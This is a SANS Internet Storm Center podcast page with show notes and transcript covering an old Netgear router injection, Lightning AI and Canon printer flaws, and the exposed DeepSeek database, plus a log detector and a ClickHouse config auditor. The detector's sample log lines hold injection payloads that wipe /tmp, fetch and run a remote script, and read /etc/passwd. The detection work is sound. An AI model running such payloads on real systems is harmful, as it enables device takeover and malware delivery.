Handler on Duty: Jim Clausing
Threat Level: green
Podcast Detail
SANS ISC Stormcast Jan 31st 2025: Old Netgear Vuln in Depth; Lightning AI RCE; Canon Printer RCE; Deepseek Leak;
If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9304.mp3
My Next Class
Network Monitoring and Threat Detection In-Depth | Baltimore | Mar 3rd - Mar 8th 2025 |
Application Security: Securing Web Apps, APIs, and Microservices | Orlando | Apr 13th - Apr 18th 2025 |
PCAPs or It Didn't Happen: Exposing an Old Netgear Vulnerability Still Active in 2025 [Guest Diary]
https://isc.sans.edu/diary/PCAPs%20or%20It%20Didn%27t%20Happen%3A%20Exposing%20an%20Old%20Netgear%20Vulnerability%20Still%20Active%20in%202025%20%5BGuest%20Diary%5D/31638
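The guest diary above walks through packet captures of exploitation attempts against end-of-life DGN1000 and DGN2200 v1 routers. As an added example (not code from the diary or from the ISC), here is a small detector that runs over constructed web-server access-log lines and pulls out the injected command from each attempt. The request shape it keys on (a GET to `setup.cgi` with `todo=syscmd` and a `cmd=` parameter) comes from the long-published public exploit for these models, which this page does not quote, so treat that signature as the example's own assumption; the IPs, timestamps and payload URL in the sample lines are made up.

```python
"""Flag requests matching the old Netgear DGN1000 / DGN2200 v1 setup.cgi
command-injection pattern in Common Log Format access logs.

Added example, not part of the ISC diary. The signature (setup.cgi with
todo=syscmd and a cmd= parameter) is taken from the public exploit for these
models, not from the diary text, and is this example's assumption.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (not real captures); RFC 5737 test addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Jan/2025:03:14:07 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://198.51.100.9/x.sh+-O+/tmp/x.sh;sh+/tmp/x.sh&curpath=/&currentsetting.htm=1 HTTP/1.1" 200 166
198.51.100.23 - - [30/Jan/2025:03:15:11 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/etc/passwd&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 0
192.0.2.44 - - [30/Jan/2025:03:16:02 +0000] "GET /setup.cgi?next_file=index.htm HTTP/1.1" 200 5120
192.0.2.45 - - [30/Jan/2025:03:17:45 +0000] "GET /index.html HTTP/1.1" 200 3000
"""

# Common Log Format: src ident user [ts] "METHOD target PROTO" status size
CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def extract_syscmd(target):
    """Return the decoded injected command if `target` is a setup.cgi
    syscmd request, otherwise None.  Decoding happens after splitting so
    '+' and %xx escapes in the payload cannot hide the parameter names."""
    parts = urlsplit(target)
    if parts.path.lower() != "/setup.cgi":
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("todo", [""])[0].lower() != "syscmd":
        return None
    # The shell payload is the first cmd= value; parse_qs already unquotes it.
    return qs.get("cmd", [""])[0]


def scan_log(text):
    """Walk log lines and collect every setup.cgi syscmd attempt.
    A 404 still counts: the attacker is probing, and the decoded command
    tells you where the next-stage payload is hosted."""
    hits = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        cmd = extract_syscmd(m["target"])
        if cmd is None:
            continue
        hits.append({
            "src": m["src"],
            "ts": m["ts"],
            "status": int(m["status"]),
            "cmd": cmd,
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["src"]} -> status {hit["status"]}: {hit["cmd"]}')
```

The decoded `cmd` value is what you want to preserve from a capture: it usually contains the download host for the second stage, which is the indicator worth blocking and sharing. A hit with a 404 response means the target was not one of these routers, but the source is still scanning for them.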
RCE Vulnerability in AI Development Platform Lightning AI
Noma Security discovered a neat remote code execution vulnerability in Lightning AI. This vulnerability is exploitable by tricking a logged-in user into clicking a simple link.
https://noma.security/noma-research-discovers-rce-vulnerability-in-ai-development-platform-lightning-ai/
Canon Laser Printers and Small Office Multifunctional Printer Vulnerabilities
Canon fixed three different vulnerabilities affecting various laser and small office multifunctional printers. These vulnerabilities may lead to remote code execution, and there are some interesting exploit opportunities.
https://www.usa.canon.com/support/canon-product-advisories/service-notice-regarding-vulnerability-measure-against-buffer-overflow-for-laser-printers-and-small-office-multifunctional-printers
Deepseek ClickHouse Database Leak
https://www.wiz.io/blog/wiz-research-uncovers-exposed-deepseek-database-leak
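The DeepSeek incident is an exposed-database problem, not an AI problem, and the fix is ordinary configuration hygiene. As an added example (not code from Wiz or from the ClickHouse project), the script below audits two constructed ClickHouse configuration snippets: a `users.xml` in the shape of the stock default (the `default` user with an empty password and `::/0` network access) next to a hardened one, and a `config.xml` that binds all interfaces next to one that binds only localhost and one internal address. The hostnames, subnets and the all-zero hash are placeholders.

```python
"""Audit ClickHouse users.xml / config.xml for the settings that turn an
internal analytics database into an internet-reachable one.

Added example; not ClickHouse project code.  The XML documents are
constructed: the weak ones mirror the shape of ClickHouse's stock users.xml
(empty password, any-network access for `default`) and a config.xml that
listens on every interface.  Subnets and the hash value are placeholders.
"""
import xml.etree.ElementTree as ET

WEAK_USERS_XML = """<clickhouse>
  <users>
    <default>
      <password></password>
      <networks><ip>::/0</ip></networks>
      <profile>default</profile>
      <quota>default</quota>
    </default>
  </users>
</clickhouse>"""

HARDENED_USERS_XML = """<clickhouse>
  <users>
    <default>
      <!-- placeholder: put the SHA-256 hex of a real secret here -->
      <password_sha256_hex>0000000000000000000000000000000000000000000000000000000000000000</password_sha256_hex>
      <networks><ip>10.20.0.0/16</ip><ip>::1</ip></networks>
      <profile>default</profile>
      <quota>default</quota>
    </default>
  </users>
</clickhouse>"""

# listen_host '::' (or '0.0.0.0') binds HTTP 8123 and native 9000 on every interface.
WEAK_CONFIG_XML = "<clickhouse><listen_host>::</listen_host></clickhouse>"
HARDENED_CONFIG_XML = (
    "<clickhouse><listen_host>127.0.0.1</listen_host>"
    "<listen_host>10.20.0.5</listen_host></clickhouse>"
)

ANY_NETWORK = {"::/0", "0.0.0.0/0"}
ANY_HOST = {"::", "0.0.0.0"}
# ClickHouse accepts a plaintext or a hashed password element; any one suffices.
PASSWORD_TAGS = ("password", "password_sha256_hex", "password_double_sha1_hex")


def _text(elem, tag):
    return (elem.findtext(tag) or "").strip()


def audit_users(xml_text):
    """Return a list of human-readable findings for each <users> entry:
    no credential configured, or network filters that admit any address."""
    findings = []
    users = ET.fromstring(xml_text).find("users")
    for user in (users if users is not None else []):
        name = user.tag  # in users.xml the element name is the username
        if not any(_text(user, tag) for tag in PASSWORD_TAGS):
            findings.append(f"user '{name}': no password set")
        networks = user.find("networks")
        if networks is None:
            findings.append(f"user '{name}': no <networks> restriction declared")
            continue
        for ip in networks.findall("ip"):
            value = (ip.text or "").strip()
            if value in ANY_NETWORK:
                findings.append(f"user '{name}': reachable from any address ({value})")
        for rx in networks.findall("host_regexp"):
            if (rx.text or "").strip() in {".*", ".+"}:
                findings.append(f"user '{name}': host_regexp matches every host")
    return findings


def audit_listen_hosts(xml_text):
    """Return the <listen_host> values that bind all interfaces."""
    root = ET.fromstring(xml_text)
    return [(h.text or "").strip() for h in root.findall("listen_host")
            if (h.text or "").strip() in ANY_HOST]


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_USERS_XML), ("hardened", HARDENED_USERS_XML)):
        print(label, audit_users(doc) or "ok")
    for label, doc in (("weak", WEAK_CONFIG_XML), ("hardened", HARDENED_CONFIG_XML)):
        print(label, audit_listen_hosts(doc) or "ok")
```

The two checks are independent: a password on `default` does nothing if the listener is on a public interface with no firewall, and a localhost-only listener does nothing once someone later adds `<listen_host>::</listen_host>` to reach the database from another host. Run this kind of audit in CI against the rendered config, not only at first deployment.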
Discussion
New discussions closed for all podcasts older than two (2) weeks
Please send your comments to our Contact Form
Network Monitoring and Threat Detection In-Depth | Baltimore | Mar 3rd - Mar 8th 2025 |
Application Security: Securing Web Apps, APIs, and Microservices | Orlando | Apr 13th - Apr 18th 2025 |
Application Security: Securing Web Apps, APIs, and Microservices | San Diego | May 5th - May 10th 2025 |
Network Monitoring and Threat Detection In-Depth | Baltimore | Jun 2nd - Jun 7th 2025 |
Application Security: Securing Web Apps, APIs, and Microservices | Washington | Jul 14th - Jul 19th 2025 |
Podcast Transcript
Hello and welcome to the Friday, January 31st, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich and today I'm recording from Jacksonville, Florida. In today's diaries we have a deep dive by David Watson, one of our undergraduate interns, into an older Netgear vulnerability, good old DGN2200 v1 and DGN1000 versions. These routers are no longer supported, but what's always surprising is how many attacks we're seeing for these particular vulnerabilities. So David took a closer look and actually did a real nice deep dive into these vulnerabilities, how they exactly work and how they are being exploited. Real neat here; even though the vulnerability itself, of course, is well known, still it's out there and a good reminder. Keep patching your routers, as I always say, once a month. Put a note in your calendar, check if your router firmware is up to date. And yes, the real big problem here is that some of these devices are end of life, and that's sometimes actually real difficult to detect or even realize that your device no longer receives any updates. That's hopefully one of the things that this new cybersecurity label that's supposed to come out is going to fix, because it's part of that specification. Routers are supposed to provide basically some kind of end-of-life date and indicator when the router will no longer be updated.

And VMware patched five different vulnerabilities in VMware Aria Operations as well as Aria Operations for Logs. The CVE numbers of some of them may be a little bit on the low side. In particular, one that's a broken access control vulnerability that does allow a normal user to execute commands as an administrator only has a 4.3. The highest CVSS score actually here is an information disclosure vulnerability, and that has a CVSS score of 8.5. Would certainly recommend patching it given some of the history with attackers targeting some of these VMware products. But at this point, there is no known exploit available, and the vulnerability was reported internally, so it's not already being exploited.

And yes, we also have vulnerable security tools again. And this time, it's at least not the big enterprise one, but an open source one, so I'll give them a little bit of a pass here. NetAlert X suffers from an unauthenticated remote code execution vulnerability. This particular tool is often used as a Wi-Fi intrusion detection system, so trying to figure out users that are scanning or trying to penetrate your Wi-Fi network. There are lots of details available about this vulnerability, so it's certainly exploitable. No exploit seen in the wild yet, as far as I'm aware. It also comes with an unauthenticated file read vulnerability that's being leveraged here. Definitely something that you do want to patch, in particular given that this particular product is somewhat exposed in its role as a wireless IDS.

And Canon released an update for its laser printers and small office multifunction printers, fixing three different vulnerabilities with a CVSS score of 9.8, some of them leading to unauthenticated remote code execution. What does save the day here a little bit is that this is not necessarily something that's easily exploited sort of remotely. These printers are typically not exposed to the internet. So interesting vulnerabilities, however, like for example in TIFF data EXIF tag processing. I could see where maybe it's being exploited by tricking the victim into printing a malicious document. I'd have to look a little bit closer at some of these vulnerabilities, but I think there are some neat sort of unique exploit opportunities here with these vulnerabilities.

And well, then in closing, we do have another AI-related story, but it's really more a story about: if you're developing new tools, you still have to worry about old vulnerabilities and, well, essentially good old known best practices. Wiz Research uncovered an exposed DeepSeek database. DeepSeek, of course, has caused a lot of news this week. In this particular case, there is a ClickHouse database, ClickHouse being one of those NoSQL-style databases. It's an open source database that they left completely exposed. And this database apparently was used to also store users' chat history, so essentially prior queries to DeepSeek, and lots of additional details were able to be recovered from this database. This is really a flaw that's not at all related to AI. It's something that we've had for years and years with similar databases, whether it's MongoDB, whether it's S3 buckets; it's all the same thing. Don't leave your crap exposed to the internet.

And with that, thanks again for listening, and talk to you again on Monday. Bye.